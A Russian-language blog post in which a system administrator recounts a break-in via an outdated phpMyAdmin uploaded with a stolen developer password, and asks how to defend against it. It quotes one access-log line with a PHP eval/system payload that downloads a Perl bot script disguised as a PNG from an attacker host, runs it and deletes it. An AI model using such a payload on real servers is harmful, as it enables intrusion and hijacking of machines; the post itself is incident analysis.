nlothik (nlothik) wrote,
nlothik
nlothik

История одного взлома

Началось всё достаточно банально. У дурака-девелопера спёрли пароль. Но что было дальше -- меня немного удивило.

Из Китая зашли под паролем девелопера, и загрузили на сайт полный дистибутив PHPMyAdmin годичной давности. В нём, разумеется, было навалом дыр. Далее, на протяжении аж двух недель этой дыркой пытались воспользоваться. И, наконец, воспользовались.

В логе было вот такое:

ip_hidden - - [13/Feb/2012:01:02:13 -0600] "GET /phpmyadmin/\rconfig/config.inc.php?eval=system('echo cd /tmp;wget http://ip_hidden/apache_32.png;mv apache_32.png -O p2.txt;curl -O http://ip_hidden/apache_32.png;mv apache_32.png; mv apache_32.png p.txt;lynx -DUMP http://ip_hidden/apache_32.png;mv apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 200 9497 "-" "curl/7.19.2 (i686-pc-linux-gnu) libcurl/7.19.2 OpenSSL/0.9.8i zlib/1.2.3 libidn/1.5"

Что делает эта штука? Скачивает файл apache_32.png, который на самом деле не картинка, а Перловый скрипт, переименовывает его, запускает через Перл, и стирает сам файл скрипта.

Скрипт дальше делает всё, что хочет хозяин скрипта (это ботовый скрипт).

Я вот думаю, а как от этого уберечься?

Вижу несколько вещей, которые можно бы сделать.

1. Автоматический аудит веб скриптов через NESSUS.
2. Запретить PHP выполнять сторонние программы. Не решение -- некоторые сайты используют тот же Image Magick, и он перестанет работать.

В-общем, как-то особо и нет решений, кроме аудита.

Может, кто из более бородатых что подскажет.
Tags: компьютерное, сисадминское
Subscribe

  • Почти всё

    Так как одиннадцатая винда фичами пока не радует, попробовал заменить на рабочем компе всё на Убунту 20.04 И оно, знаете, практически взлетело.…

  • Про одиннадцатую винду

    Что-то не хочется мне на неё обновляться. Главная проблема в новой системе виртуализированной безопасности (virtualization-based security, VBS).…

  • Размер кластера

    Интересную вещь обнаружил. Оказывается, максимальный размер кластера NTFS в десятой винде и соответствующей серверной версии (2016+) может…

  • Post a new comment

    Error

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

    When you submit the form an invisible reCAPTCHA check will be performed.
    You must follow the Privacy Policy and Google Terms of use.
  • 0 comments